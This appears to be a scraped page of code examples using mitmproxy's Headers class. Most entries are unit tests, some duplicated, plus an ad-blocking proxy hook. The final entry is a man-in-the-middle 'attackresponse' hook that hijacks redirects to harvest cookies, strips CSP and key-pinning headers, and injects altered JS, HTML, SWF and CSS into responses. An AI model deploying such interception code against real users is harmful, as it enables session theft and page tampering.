Exemple #1
0
 def test_replace_simple(self):
     headers = Headers(Host="example.com", Accept="text/plain")
     replacements = headers.replace("Host: ", "X-Host: ")
     assert replacements == 1
     assert headers["X-Host"] == "example.com"
     assert "Host" not in headers
     assert headers["Accept"] == "text/plain"
Exemple #2
0
 def test_replace_simple(self):
     headers = Headers(Host="example.com", Accept="text/plain")
     replacements = headers.replace("Host: ", "X-Host: ")
     assert replacements == 1
     assert headers["X-Host"] == "example.com"
     assert "Host" not in headers
     assert headers["Accept"] == "text/plain"
Exemple #3
0
    def test_bytes(self):
        headers = Headers(Host="example.com")
        assert bytes(headers) == b"Host: example.com\r\n"

        headers = Headers([[b"Host", b"example.com"],
                           [b"Accept", b"text/plain"]])
        assert bytes(headers) == b"Host: example.com\r\nAccept: text/plain\r\n"

        headers = Headers()
        assert bytes(headers) == b""
Exemple #4
0
 def _2host(self):
     return Headers(
         (
             (b"Host", b"example.com"),
             (b"host", b"example.org")
         )
     )
Exemple #5
0
def request(context, flow):
    req = flow.request
    # accept = flow.request.headers["Accept"]
    # context.log("accept: %s" % flow.request.accept)

    options = {'domain': req.host}

    if IMAGE_MATCHER.search(req.path):
        options["image"] = True
    elif SCRIPT_MATCHER.search(req.path):
        options["script"] = True
    elif STYLESHEET_MATCHER.search(req.path):
        options["stylesheet"] = True

    if rules.should_block(req.url, options):
        context.log("vvvvvvvvvvvvvvvvvvvv BLOCKED vvvvvvvvvvvvvvvvvvvvvvvvvvv")
        context.log("accept: %s" % flow.request.headers.get("Accept"))
        context.log("blocked-url: %s" % flow.request.url)
        context.log("^^^^^^^^^^^^^^^^^^^^ BLOCKED ^^^^^^^^^^^^^^^^^^^^^^^^^^^")

        # resp = HTTPResponse((1,1), 404, "OK",
        #     ODictCaseless([["Content-Type", "text/html"]]),
        #     "A terrible ad has been removed!")

        # HTTPResponse(http_version, status_code, reason, headers, content, timestamp_start=None, timestamp_end=None)

        # resp = HTTPResponse(
        #     (1,1),
        #     200,
        #     "OK",
        #     ODictCaseless(
        #         [
        #             ["Content-Type", "text/html"]
        #         ]
        #     ),
        #     "BLOCKED."
        # )

        # def __init__(
        #         self,
        #         http_version,
        #         status_code,
        #         reason,
        #         headers,
        #         content,
        #         timestamp_start=None,
        #         timestamp_end=None,
        #         is_replay=False

        resp = HTTPResponse(
            b"HTTP/1.1",  #(1,1),
            200,
            "OK",
            Headers(content_type="text/html; charset=utf-8"),
            b"BLOCKED",
        )

        flow.reply(resp)
    else:
        context.log("url: %s" % flow.request.url)
 def test_set(self):
     headers = Headers()
     headers[u"foo"] = u"1"
     headers[b"bar"] = b"2"
     headers["baz"] = b"3"
     with raises(TypeError):
         headers["foobar"] = 42
     assert len(headers) == 3
Exemple #7
0
    def test_init(self):
        headers = Headers()
        assert len(headers) == 0

        headers = Headers([[b"Host", b"example.com"]])
        assert len(headers) == 1
        assert headers["Host"] == "example.com"

        headers = Headers(Host="example.com")
        assert len(headers) == 1
        assert headers["Host"] == "example.com"

        headers = Headers(
            [[b"Host", b"invalid"]],
            Host="example.com"
        )
        assert len(headers) == 1
        assert headers["Host"] == "example.com"

        headers = Headers(
            [[b"Host", b"invalid"], [b"Accept", b"text/plain"]],
            Host="example.com"
        )
        assert len(headers) == 2
        assert headers["Host"] == "example.com"
        assert headers["Accept"] == "text/plain"

        with raises(TypeError):
            Headers([[b"Host", u"not-bytes"]])
Exemple #8
0
 def test_replace_remove_spacer(self):
     headers = Headers(Host="example.com")
     replacements = headers.replace(r"Host: ", "X-Host ")
     assert replacements == 0
     assert headers["Host"] == "example.com"
 def test_replace_with_count(self):
     headers = Headers(Host="foobarfoo.com", Accept="foo/bar")
     replacements = headers.replace("foo", "bar", count=1)
     assert replacements == 1
Exemple #10
0
 def test_replace_with_count(self):
     headers = Headers(Host="foobarfoo.com", Accept="foo/bar")
     replacements = headers.replace("foo", "bar", count=1)
     assert replacements == 1
Exemple #11
0
 def test_replace_remove_spacer(self):
     headers = Headers(Host="example.com")
     replacements = headers.replace(r"Host: ", "X-Host ")
     assert replacements == 0
     assert headers["Host"] == "example.com"
Exemple #12
0
def attackresponse(context, flow): #{{{
    # flow.response.headers["Testing123"] = "456"
    url = flow.request.url

    # on 301/302: fetch the resource completely and return it, but pay attention to cookies!
    if hijackRedirects and flow.response.status_code in [301, 302]:
        # this should not fail, but you never know
        if "location" in flow.response.headers:
            logging.debug("Hijacking redirected %s" % url)
            logResponse(url, { "hijackedRedirect": True })


            # make the same request, but log all cookies
            reqsess = requests.Session()
            myheaders = flow.request.headers
            for h in ["host"]:
                if h in myheaders:
                    del myheaders[h]
            newresp = reqsess.get(url, headers = myheaders)


            # add the new cookies
            newcookies = ["%s=%s" % (k,v) for k,v in reqsess.cookies.items()]
            newheaders = newresp.headers.items()
            for c in newcookies:
                newheaders += [("Set-Cookie", c)]

            # compose result to browser
            flow.response.code = newresp.status_code
            flow.response.reason = newresp.reason
            flow.response.headers = Headers(newheaders)
            flow.response.content = newresp.content
            if "content-encoding" in flow.response.headers:
                flow.response.encode(flow.response.headers["content-encoding"])

            # also update stickycookies with newly learned cookies
            context._master.process_new_response(flow)


    # throw away some headers
    for h in ["content-security-policy", "public-key-pins", "upgrade-insecure-requests"]:
        if h in flow.response.headers:
            logging.info("Removing header '%s': '%s'" % (h, flow.response.headers[h]))
            del flow.response.headers[h]
            logResponse(url, { "headers": { h: True }})
        else:
            logResponse(url, { "headers": { h: False }})

    if "content-type" in flow.response.headers:
        mimetype = flow.response.headers.get_all("content-type")[0]
    else:
        mimetype = ""
    mimetype = ""
    logResponse(url, { "content-type": mimetype })

    with decoded(flow.response):
        url = flow.request.url
        data = flow.response.content
        urlparts = urlparse(url)

        data = attack_js(url, urlparts, mimetype, data)
        data = attack_html(url, urlparts, mimetype, data)
        data = attack_swf(url, urlparts, mimetype, data)
        data = attack_css(url, urlparts, mimetype, data)

        # write back data
        flow.response.content = data